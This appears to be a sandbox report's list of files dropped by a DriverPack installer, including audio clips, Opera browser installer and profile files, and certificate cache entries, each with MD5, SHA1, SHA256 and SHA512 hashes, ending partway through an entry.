SHA256 16c3cb0e4b2d80c3b31912fe736f7fc7713ec5a4da76150afba505b79ca69963
SHA512 0522bf95957ef1c135d60871a5cbbb73ca67ca84a6a47a158084ac4f4e0fafcecd50e83f9e9ea9e84cc5c739086a2396541a2befc2be2449e32bf12364202d3c

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UA1HZF3D\RELIABILITY-1[1].mp3

MD5 fea8d97e1dd2f9dcb2d73c0b3623d31e
SHA1 fa4d01ad6a4c2eec678b196111d449ee44cd761f
SHA256 c674ea1b4060fa3268aa027ba9de96bc077a788ddf77d64ee9f7fc1973c23d75
SHA512 e07b8bf9cd74f490a0c4f5fbc21d091736803fd6f5cd1c6c07fe63328b0cd3059b42e8fc05a6eb64a6bfabbda66aaf3ab834e33ed1f6572bf18e7712808313c1

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\CHECKING-2.mp3

MD5 e63294c8da29575ab503bd5c4f1bfca9
SHA1 a792f87607f6933e93a84e411040a00fa44b5b98
SHA256 eb68acedbbecbbeaa15d5b53b5286c27bfa38e28e6001a92a33814677a74723b
SHA512 e72368b9f935aad295e85eb567dd04f6d49b9ba4634b2630a55e489915351d9cd7250c0c75483a0e99f71ed5b1d459674561af2cab3c9e40922331ae405e151a

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-all-1.mp3

MD5 70dbac8b086d4eadded6b0df22bf0c37
SHA1 f53d1979ebac5b0fc972418ebdd8dd3fcc6ce3d0
SHA256 ee01fc17ce3cfd92dec0f14da57af07fb4f11031e4309a4b1fbbeca75a6915e7
SHA512 a7228b0f11b5bb94feda2e9fdcfe7fb439de1438999ce61d254ec47d6620d6b87bdb1a943a9a044a9359acd605d272d2b722dcc37fb144f7c57179244f67fb19

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UA1HZF3D\STORIES-adout-4[1].mp3

MD5 94f5629e456ec789f57d3c03abea8838
SHA1 7dcb8db4b2962d412917fd4ebf07bbdf92fbc9b1
SHA256 4743e05e9b5f21c527a3a40eb3dcc62d1f318fd7c1a02f11391e476dbe4aac41
SHA512 4c2bdf8c585b8aa07d8ee8ba18f2d34839ed5a4e20a13ecf6f0cbdadc78552a05d99f20456ff1e4a7862412e87a47a6270c9bc4af80dfede1cf16bf749ac746d

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-adout-5.mp3

MD5 51f1d81bf4693f300bc93d3f92a15000
SHA1 0737b2125c940423f746b2d8ac045eb8d05c4c5a
SHA256 89d12ec1823c0baac1c75af8534ec7e898a338a5dc68a7600199751d3fec013e
SHA512 96bef9264cc19ec75c1f05f302abb2c2649cd5b2ee8ac4529053b555f9e40b84ac3e00236366bce10d32096a87cde1299c60e594eb55edb1b1176e27d070c0ec

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-adout-6.mp3

MD5 b9983693adab70b39715e327e80ff6ce
SHA1 f827b214ee555b12dde35a45ee9259e33e9c7cce
SHA256 cfec171e772952d1aa3bd89a23fffa27cef7ba0fdd9c38fcf26d521f45894220
SHA512 f1b47373c8449605719e939da2f61076754a2c9d34adfe3069ccf5422dbd2b81074227d76ef20b1e8b4148dde3c7a9622d0f0040c0eafa9a6d90172a4fbdfa97

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UA1HZF3D\STORIES-adout-3[1].mp3

MD5 25353a803d4b81e0648ce219f751ec6f
SHA1 c4000978429218c74d9c8c3c7bd5b06a8c081981
SHA256 a512f24fb4c081074da0d02b70f51d298704ba2e3d46bdb2ae5f542ea55f221f
SHA512 1d6e770f822fe66a0050df8e3f8cc69c3e1d9644e7169bfd1ebcd97d392887b18f4d2c5ca11a30ebf5ddf0c1fa53150df9c6497e54c8cfd3bb53d4ea6b205697

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\STORIES-adout-1[1].mp3

MD5 b688730426acb83d2283c38581fa99f0
SHA1 dbf48abea98acb5dbb5976d41466ba0d0be2bec4
SHA256 0cc62cca26c8e6a4819b016ae112702b9f6e6a0eff95e074c18dd862b47a93d7
SHA512 7f377d99cd7f9a7a6a44946104683542c551f82eb12a53239864d6ae6c81dc53ec4e17e1bf339e406a06c8bec250ebb00f105da721118df7b4a65080dbc7dd3d

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-adout-10.mp3

MD5 b19973bc5c9bf69a3b52760bff6bfa43
SHA1 a605f983c6f8df9f42c53ddc694662fc34e7111d
SHA256 0d2125666d4e5706a1515a61b988fce4b25f989002c85bc8fadaad799c58da5b
SHA512 03066e79501cfbaa3378b14f4c966aefa9e3668f370b87fd806fda81d098011c4ce839a12d5e07e11e5e07aec157e86eb7a3a41565febf7865d313e6eed54a44

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-technologies-4.mp3

MD5 7195825e928da790d0754d3067d6a42f
SHA1 eb434bef7d91a17e1acb4e07b1e12149f8d71d6a
SHA256 2a5bd14d259807efd69e5aecccae66c53892e980ffd91e7ff977bdcc75ceefd4
SHA512 fd5c4b9cf97ba3c51bf548da97b2b4e1fe68392383e5d7752d8c55889fedc5f14e26c618d15ca6cf92a5a67c95625c6fc658304d0e12474fa3da75ee0f397e33

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UA1HZF3D\STORIES-technologies-2[1].mp3

MD5 eec9a835c12d72410d7054c9bf8a3e79
SHA1 ea1f1aae09b1af8283bf42dc5093b4deee46ddba
SHA256 0d17e13fdc96aaeedb2a761c55c80bb21f6ac03be1b0975f788678cb6248ecf9
SHA512 da7c72ec4235682eed3c4f32bae25a78a09553f8ba6f102665a7dbc1c6f38772911d81823e67342dbd326f583b9d70d46b9d6541f95f53a4d82b6cf6721f0049

C:\Users\Admin\AppData\Roaming\DRPSu\Logs\log___2024-05-03-16-50-18.html

MD5 cf85c2a1a1fbdeb463fd50561a4fb6ca
SHA1 eea259525ef045d587dad36ce3f661beb41f1a44
SHA256 fd7f908c62791ffac3ae2bd9bd5fdece01587af396016a56b2815d2e2cfa2f56
SHA512 8d4bd7e56a90882edc16881f7f4ff0043a634b9eef00dbec7e2d4e39c75a46c33d40382964fc12aea2ca87d635b243f2bd2e588e6f0562a34a9775d240e6e0fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UA1HZF3D\STORIES-technologies-14[1].mp3

MD5 f65b5b878abffdd412bac52756f75f6a
SHA1 ca85749bde01a111059273d2db3ec4cceb0da954
SHA256 17626d6bd339eee95c212524baf94344d5467ac1aa95aae9e445beceb8821c92
SHA512 57e3de3728d1017855004015fa2a4d17fd84f03c30dfaf1a21adc23e07e487247a7117f5bc150e26e1c5284c9baa193e460bc84ab615f73f98ede2941369953d

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-technologies-15.mp3

MD5 2ddb38b84395cc79bace10ca61ade130
SHA1 9c944b852de75eb69ff9f194ca3e7e9abea0795d
SHA256 7e9c49f685f63da567977ecea43d4147ce35f823aaf6ca4221e3e4df992caa86
SHA512 efa54c91daafecde061211ee58bbbdfe3fc64789a472bd52016ccf859b24238bbbe77a67d1188c6d33224c3539d0891fd80cbc08b66e24ccc2f5827d609a95d4

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-technologies-16.mp3

MD5 ba941e5ed9bdcdd0e9ae36adf296f2b3
SHA1 b2e618078e5a7dc2f83ba1a7d2fdca1fd664c782
SHA256 bf4e465d05a6601fa2f891acf8874721269d912b534ae83e39adf3f63aa4ec3d
SHA512 0fad3925043a664aec1435d556cc1d10f37983011b0d05889a410be42997999028b6e6a5a086ed194e59440615ec60a07c12905fc65cce5a7755217e82a338c5

C:\Users\Admin\AppData\Local\Temp\Opera Installer\OperaXP.exe

MD5 36f8b3bb2ba2194db065637af8bf4453
SHA1 1262df44dcc47e5a81f17e559252247f9f35b914
SHA256 ac4dfaed56f4a4259befff7471d8d297e3d5c13951aad6b64280830dd36d1724
SHA512 7c22d94fcb5cba4669d53929a73240879875c26cfa43bf9135c1772e024fe8991618150fa26550e89fdb5a40e6e642d80ab81c523dba29f441c1b389a9fc37c6

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JB8Q1DZR\STORIES-technologies-10[1].mp3

MD5 f59dadc6fc70bb018d9d526a2a3465ea
SHA1 7485388897b2a89484db08c046adccb4a8b3a05a
SHA256 fd3248c654f784d8b29033e09f010f2b79645540fc4a620f5262b77fcb21a740
SHA512 6cbd73c87d503054270757bd653d3e3f4514ec525830565505b5e90c0ab51b22cb006c73f50eea3f267c31b175efa0d48362ad65c39e71b5db7cd8768e236b89

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\STORIES-technologies-9[1].mp3

MD5 2225e8c82c26c579a7d4aa7713ec1a43
SHA1 a9fd2faaa345fb57eec9c800613659656d08f2a2
SHA256 1647ef9c48f68c3b8411992deba36f2c8bc6ddb0ca847a43b1197056162efc29
SHA512 49ae375d718909a278130419bded6bf790b7a3557f4eaedac02e1d1e7f9cce2a69cee62c49f4c0e212eae442b67a4e83542e3f13d5ae6e013c402c2db69b303d

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\STORIES-technologies-12[1].mp3

MD5 819782d42537dc71dd7e5c038d737d9b
SHA1 6be592c88285912ea7cea5c2169732a1024947a0
SHA256 5a6b7ce4071be9b5f1dd507d3e4448b51a0cb5b2b202be68d388927e4eea8258
SHA512 589210579d1bdefec96ab04754cde4527c154a8e1d12aa43f7bbba89cfd520817b47b630c6794d602cee78eaa6902fcf519292a0f5a5db1d572a057f14be5c3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\STORIES-technologies-13[1].mp3

MD5 b8e91d90e356469406cc630777d4c9cb
SHA1 5fb93a3139bcd178e63c90d6853a932bc8c45d3c
SHA256 ab89f8dc6b312b1dc2000b631f106b7aa40b47af464c4a9718141e36047b5be7
SHA512 dfc42619a9f3d0e683a2bb123fee1a9611f64b7f786ca6b9799359fc6579c8d98fee746c6fa4ba8a398160097dd8bf3cc8db20823aa436e51bb95332f3e3408d

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-technologies-7.mp3

MD5 7761ad9b5bd050412094d0a8101e9fba
SHA1 afc48220a1abba1297ff3df721cf24b225f360cb
SHA256 8a3955deea102f9685128162e1eed51995ed83c7166ac94fe08246997bd2c1d9
SHA512 eab038efe577cb4107abb5f94fec17f56ba74f4a3b3919ffd049151071f0f9e66bbe0a88c7a3dff00e8743c96cd5d6f530ddfaf008267208bcb44604eb2e9d22

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UA1HZF3D\STORIES-technologies-8[1].mp3

MD5 64e603ededa8987d56396caaa54df8b0
SHA1 d881f1b4da2a408dc0791577426da59f8dfe0377
SHA256 5989afd754f7e8bedf760c8e0d62f9bbbddc7bbe1ffcfdeb3490c93ec3c8317b
SHA512 2e91d27cee10bfb9934bbb8bb9c8f8a553d6359941bc793f3fe7039b94768eaeea9b4c258796d80c828edb81cd7b737a081093d0c196b3a6fc323927549f96d2

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-why-free-1.mp3

MD5 b58b594573bc6956db5e71e8a3d9bd9c
SHA1 eb12489490ffdb6be1f8aebbbb981b7e9d771894
SHA256 80d7f2f412f761bbd587b0e2066a42afd0b8d353d6852163fef76375d39db435
SHA512 cba973183c981cb84d9a92ebe2165a28944dbdbdcd7138d270f4a5ec8a9b64c1788425e584f68070a89e5080bdbb8521f806e3f465519bbce7eb4531cdbb61b4

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\STORIES-why-free-4[1].mp3

MD5 51fc80bc6197ea903aa733ad0bf27e6a
SHA1 79329f843b1216d860c319e331d0c2a8c612acb2
SHA256 415167a95f5481105beab4c7bdfef0d4bd4c87828385f8116f330ba6cd969bde
SHA512 2fa60c3f9f4c2a3d3f620b3266679847be363a0f9553f634202b1d9dfa73b2722904102d45a8d56cdd7bfe0260f7f0a7187f6fb6a192f500cbc5a95a643ba19d

C:\Users\Admin\AppData\Local\Temp\Cab252E.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UA1HZF3D\STORIES-why-free-3[1].mp3

MD5 1a445b2805dce9ce607e23963e9dfbbe
SHA1 d2f057dd1a440b7f2b8d0ae05f98c4c4ef7f9a84
SHA256 b3fed1c83ddff879019142c84ba4cca2af87f7261ac0973a2aad0f2685ca9fdf
SHA512 b1c8ad341e53afe5a80ebc01c72d212af38db10d2f8bf43166dee0bc55ba5926fb58457bbb617e8808d4223de0bc2d74e3ffd82e20de06f97265fc17db12b576

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JB8Q1DZR\STORIES-why-free-2[1].mp3

MD5 020ab1269053b6a5c93c7ca5ce4a3a7f
SHA1 4630407ec70dc4fefeb45d55d84275511231df39
SHA256 394489ad361dd731e5e186eaf79edef920d60381383750ada59a5a6b56f5889b
SHA512 8a50b315a346c6fee4a147f33208cb004afed67a07d2bacd2e0627b504c38c0add88288029b0f407ed1750163c33581d6469d7a5ad40f89a1ec6bbea29d61414

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\STORIES-technologies-6[1].mp3

MD5 050c1f65d8d03df2afb48032f80ace49
SHA1 db8a971d1e6d7abab92079e77b893a4d5b1b7d7e
SHA256 e00eaec5ed13beaef4f32f6d016fec0036485c2edcb421c5d48e3be94302fd12
SHA512 d916415d7b571b8cb6836cba5ba0d7880b81011395e9fe7da52b1160a27364898da6069e29d7dd62c78b81c0985cb27fe8e13712ffac9d4bc5797eaa8cdd2da5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar288F.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 7354b288e297a7c94aeb3fbd7c43c754
SHA1 3cc07c5cd8b71592c1560a4e051fbda471fd3a36
SHA256 d0094de44bb96707725518e8f1a40a2e03835d9c5851e69565d94b2b6e434d54
SHA512 e5556e4dada576d6cf13935ddbce2a63ee638c2f24dfd2a5719c0b88fef83fcaea97c68cfe78ee292d55ac4691775b122c75643a825d119c6cc8f50511e6c1a1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Program Files (x86)\Opera\36.0.2130.80\resources\6D3582E1-6013-429F-BB34-C75B90CDD1F8.ico

MD5 74fdac19593602b8d25a5e2fdb9c3051
SHA1 81db52e9ad1be5946dffa3c89f5302633a7698d2
SHA256 f06ebef0b912b94d7e0af3915f2a6b6b64f74cb60bc8aaa1104c874761a0dee6
SHA512 8ffb507e46c99f1fede3f12c14998cd41afa8cfc5c815756343041f1bef6faf7ba4429cebeb87b0fb807d911f5516d235d5f893e519576b1fb675d25d025c21b

C:\Program Files (x86)\Opera\36.0.2130.80\resources\C665D993-1B49-4C2E-962C-BEB19993BB86.ico

MD5 86509075838848045c675a8b0121ceb2
SHA1 0a7ce9410e39dba20bae104e68f6be4dc20bc8a9
SHA256 08ae3b1d2edc5a4794e715c9951174c0211a7281126f73337be55940c22a1f70
SHA512 ebe220d1dd1977f18b4ec5bd4ae5990b8c775a3fb7f0016bb41a175a470197c2dbc5e29474fe0a4361d780a79653c42824371dc638485dabd57d2b616abf2608

C:\Users\Admin\AppData\Local\Temp\Opera Installer\opera_installer_20240503165131\Opera.lnk

MD5 6f302004d35012f28b76a3c42b3d9978
SHA1 a2876355e86079caaefca913428e56b9f805bf8a
SHA256 8318351dff98dcaad5ddffd9fe80bda9384fb937004d9801a4b409d448a5ba8a
SHA512 e997e4514f39bb8abe26536106e046383e04fc6638a12a5e8c8d8daa7dccb9a1ccaaecee59798cf2e28ee8d6545ec5c696fa843ec4d6e7c635614bcaba8039c0

C:\Program Files (x86)\Opera\launcher.exe

MD5 92e3704809d7a2a7be942e189064e395
SHA1 7b258de9a78ddd67d1cd0a05c1b526029c67906c
SHA256 9c18e76a86bad63a934cd69201bfcd8d0178075e1fefd3fff7c64e6fa1fd4929
SHA512 4d80117633c67e1a131fbc50f6ae8443f198f94c98b0453819aac7e5a09ce9eb9efeae47fc0cad55bde9c077c16a9feed827830ad754d183e356ef61b31385f1

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-why-free-15.mp3

MD5 935dcb1e2f9bc2ac5629c8554aa2f525
SHA1 741bfc9d9feb46c2a0149c5faaf9075fa89ebff0
SHA256 4a99566ba26fa5d3dafe29550f8276ce6991662e8057c933f8127ded7a19d4ef
SHA512 68d84cbdfe4444cfde0c26a9ac6e63810373109c0d15b692ea8d6aaa4c7dc01fe42b23573a50190127616bb6b49138ed85d59364c7fdd352ff53254805986ab0

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-why-free-11.mp3

MD5 af4a3fb0f94a3bdb626dbf5183287f3c
SHA1 6b86e5a3a7d20d20d45e9395334560bd14522c4f
SHA256 3d3055653f4df0c0b1b888d332abf70252da0101ec64651a71281e716f98b3f8
SHA512 d3cdcfbad828e15363ab95d1d6e83551c9c1d93c0e4abf275a9d71f8f255671ceeedc9ffec97d1101bb9aaa3fa7fc6ee27bf2a3ad8b96113c717eb262dd854f2

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-why-free-14.mp3

MD5 526a10bbdbec77e818ba5c074887c6ab
SHA1 15ea9389a5285a7c387faa05ac1ac1c4db62f0b8
SHA256 3fc2a5240abb041c710d268ea59f759c3519e971eafb2c375848caecb020bfa3
SHA512 a5e4a412df7d44c7b7de893ea7ce4dd4746f4d2f1200ccdcb308136032876ca827dce12996a2c87af38cc0a6846143c7a7f0c82f2286282be4503e08e938630a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4436c0ad308b2e3e8b6ef911007f6f66
SHA1 9f0c64e168d3ababc1eaffe80b5eaabe2c4297e9
SHA256 aff31a4aca1b08472fe360b1cdf13e37fc7cdba41ada36b70307deb384e1fd23
SHA512 d6f7dad801d28575d79673fbebf6422850559317f108c82403ceab573d72c30fe31ff285b04569860831d86ea4a5bc3b8c3c302ad33392f7341d1adb9aea8508

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 21fcbcb561009aac4a5955379803a548
SHA1 ea0a274dc7e1b91dae69b5bea9c62ae0f35e9fc6
SHA256 2ae53d0ab0276405568ea9273f9b14be33f92d0c91acd28aa6736ba77f8c7717
SHA512 e82e8a28305c147811a2631467896a295ea60ff48f48ad080001f24d76adc47e6e0d46ff03c05a7b10b2fafb990254b585b037810c6bb02dd74bfab110b6a67e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 23ae3277dc69928e5bf91dca1ec1dbbc
SHA1 e5c4f38cab7397b3420cca49e33b81e671746c73
SHA256 0e155b8c34021f9059249016c8685043d141da218c442a7dd42d9f2a2b3d2abf
SHA512 d961d48811ae1cc759e096471cd58f2269c98b88e1a2220665f68623f810915955bd1f5802b74d964cee8ec06587d755565233fd8e1ec5e5e4ed48fc6cfc23be

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c994b82a0729b2179c7685de99e22588
SHA1 eaa3550d9d9aab1e8a1b553fc77c0e068f35704d
SHA256 11a4a178b221075cb3a1b14400984571e9f3252192908c6ede1618dc17b1553c
SHA512 9535404bc4082f29a711e3f386e5b8aff8ef13709148c9ef25494765a894ca75f19111ab4683b1038357847e3e1004f163afa4ef2e9cefb871bf96ad74f74238

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ea0610f9136875cc326d357a5983250a
SHA1 7e2d45bb07f3d039a1d0da6b7dbe30675b719c70
SHA256 8c52242bbab23c9cb727fdd9b5e41b19bfb6f1f5a425499b1f9ef96889805acf
SHA512 d9f02c4d825e542cdd3339ff3cae18ff1560d2cb336d67ea9475e27b9df97dd1abe3d0564ea8875f1463ef5dce6a2807bc1aa82cbc94682af6a5347e5ae153ae

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5824d0bb4ca9bc3de04266146e0d2737
SHA1 a2f1a364731a6c828acf994d7dd090d70c78d459
SHA256 a4e0c6c742664e62889dcffa3222f4115337bad56d19f718b6fa0226a2dd0023
SHA512 2a297c0ccd0087f754436a2f883a39301e702356b8202482384a8ba5099c0402ffb05b2eb3f0b301458f410d345c0789bda8d74f69b95b2ca1943e1d87ef8176

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp2544.0.1673862029

MD5 496acd1a8109ecd1257f3b0bcf692cbc
SHA1 65bd973edee11f8d6b560afd20325711e54f3654
SHA256 b5ee9ae26471610222adc0c39c77d1ec898ad4ffb311c3ff72adb664bbffe2c0
SHA512 f3203850c038d772f967f4e806d39e55a6a5f7f1b345181a7a51b860900dcf8333444ce3468b70b614621c1ab05848c5c39274358422c16a9b987f3e283e7b9c

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp2544.0.1673862029

MD5 00f63f5d6eb6d62fc298abffd685e174
SHA1 9d4e16365ce212b7314f2b907f99a4a2b327bdd9
SHA256 79951ceffb4c1366dfe71d564de120aa873ef250cbb268da23e014d6f48d4708
SHA512 7ff692ba7815eae528ca2d37d3f7473541d2f351569f385cc7d028c4a95c109fb37d05df27830cae30d8aa4b291793dd9816108785906e2210ff5905c288dec7

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp2544.0.1673862029

MD5 219e86f32889ca75a0f5f272edcf924a
SHA1 9230c2f6661de53fa828f5389dc6d9a052d483cd
SHA256 d33039424556946bbc96e866e7f62f2f14cf6df8258e7fbc59d193a602168314
SHA512 bae05cdf539be89d58b5589b180c93e349e1bde7e1c29eb2b389be631191e79f6abb6421090e66b177e82acc47896ec807a918668ad396771b3e53619f033053

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp2544.0.1673862029

MD5 09deb6cd8ea74002d621378bfb5da964
SHA1 5ed29b4d706067f61fd3dfba40e9fc4827e072d3
SHA256 4b52443e1662b292410a84616006ba9f1eaae99570f37310d3b9ad5bd21f9599
SHA512 efe068655d973d4c5adff4d3e1a6aba9c9b839fd7b3d1c4562bfa479b1064ed236b9dd80d56fa1cb626b907950016f379c299b1cd22ed9cb4774964e2ccc76c2

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp2544.0.1673862029

MD5 39421661321344a8ab002c8ab64159ea
SHA1 c8ab1a08ba13b331f273a34f7b1d23f83525d544
SHA256 d293517f888d996704d256b6a4802b6b1a2e18b4d58a62701a3d1ef3837a14d1
SHA512 1d6eafb0706ae3d0acd3cbca95c5bb4171f81654fc5a6c86bccc8bc0720ff03d780b9fd395a39020d96c30b90adf63877c26c2061a444e8e85f7679cf2a6202b

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\STORIES-false-positive-5.mp3

MD5 ca1e546c820564049cb7917a2e9938a4
SHA1 528106613c3ad5ca58874c9bbb6c156c996d4c48
SHA256 a777241899c5a6328ac41a9fc196d36be1d21f9f3d11834664e1f056fa207d23
SHA512 2c45f5d073c00eac97978b426a3f905c3927d1526b576820b9405d9eaa354c4327148711afd9cda0d85816f347d8b6d287d64b2e27befb2d63096d3c54d64c6b

C:\Windows\Temp\opera autoupdate\installer.exe

MD5 d63112d35d02d4fd55cdc3202b9523b2
SHA1 af571d04c5ff4247c46f47a37b6e7baa7e316765
SHA256 96fbc94c769cd55540e873b0ed9821558a39f0270d855bc7c9201037e0708ae1
SHA512 88204d270438365cc6e42ccfcd4b822573184be22b7833d175629e7840aa69443daf9ec06eb2d23d3b6c036c2d3ab64e84b917a26c9c08ace6f61781692afa9d

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\STORIES-false-positive-3[1].mp3

MD5 4db35b91df3efd31fbe130bee0f66335
SHA1 4908d872a98cfe2537ad603c6db8610dca2606cd
SHA256 d5dfdb3f2e4814c3a8c9aae040914c349c0f15dbad0ff4b1464bc5fdd75b8c95
SHA512 d610da3851c19736022497a428f953460e252be15dc1a2972f3d3304e72219108699e22600c0e25a117a6395d5a2e314ec329e3952d8ba85994a2b1aa470fbb1

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JB8Q1DZR\STORIES-false-positive-1[1].mp3

MD5 3aafef77732959cc27dc199ff82a64a3
SHA1 adb17d3836263f43feebc64da576258b63cbca97
SHA256 6268fa9b997f82340a796771d4339e11dc43558203a33c76ffd7b6c81bfae289
SHA512 1780e1a49b8f8aebef715e8947ed20b8816871d8bb1b1eb69c339580ec0b5f37ec3e534b539692897d4e752c7273b2a39facfe19707414d0e166c96b00c84ee2

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UA1HZF3D\STORIES-false-positive-9[1].mp3

MD5 9fcc234bacd9f31104b255ce8b5ed64b
SHA1 4bf9da9835b323f6194d960863de9f87729980e0
SHA256 2e71b7b1da39469f7461ad2e7d2c58876efdd2b444d4c972e0af3d2fd056b958
SHA512 929ed7c3a1352f84dae370dbb8c9294d5e9a24c82bb2bf487d7ffa648481b63eb75e25f3e858309fc97b2a9f3a3db740bb62205305def9ffc5901c9ff281fdd2

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp2544.6.494776672

MD5 d843ffd485ff62eeacee22382a299d19
SHA1 e38dd8f831edac74d4d599a8e37394ef22d1949d
SHA256 4288815720997124aed8aa21439f8bf8d945747d84c34dc5a38710f67aca74a8
SHA512 3c2b8bf88815d830a504460bd175a68d9751c08be38a94927416167db351adb8cbb4b5be2cd6f1b964811ac60027fbf1b5830ce41bb5bdfb0bee7171a55ad2ba

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\STORIES-false-positive-12[1].mp3

MD5 7ad51da97d751a5f3065843b8d46f789
SHA1 9b3d41740c733e8576736e750f8cfb3d5517e657
SHA256 5d93966a5be0635e1ad9f49ed992c9ea4ba4f398f58c5da13b9c05376cd4cca6
SHA512 3423e0a6c42be387dedbdd8ddc93fa5b5fd2a6a9bdd6992dd1839c15db57ef0a9d0c41071a1ecdff60f6f6ba229c6b10e1a69bb4c1ac08c2f2d96d9ba8c89b5e

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\STORIES-false-positive-13[1].mp3

MD5 9ae25e1e171a4dfe804de5adbdd84098
SHA1 02bafccc047381ce3f264aa28be60b6b870e33b9
SHA256 571d3c5acb08c88bf56760a02d98e054166d1dad52b49b3836edc0cdd4c12a50
SHA512 c40feed6542d4087acd4c483f8a2fccf4c1743b1c2ffa70fab04d2338ffe7110bbcd66fb923cb463fe652ac2fb0a9906461853d3350033596b36f9a5332dc056

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\49E0.tmp

MD5 e359ed20ba7df6de7a43d12525f34ff6
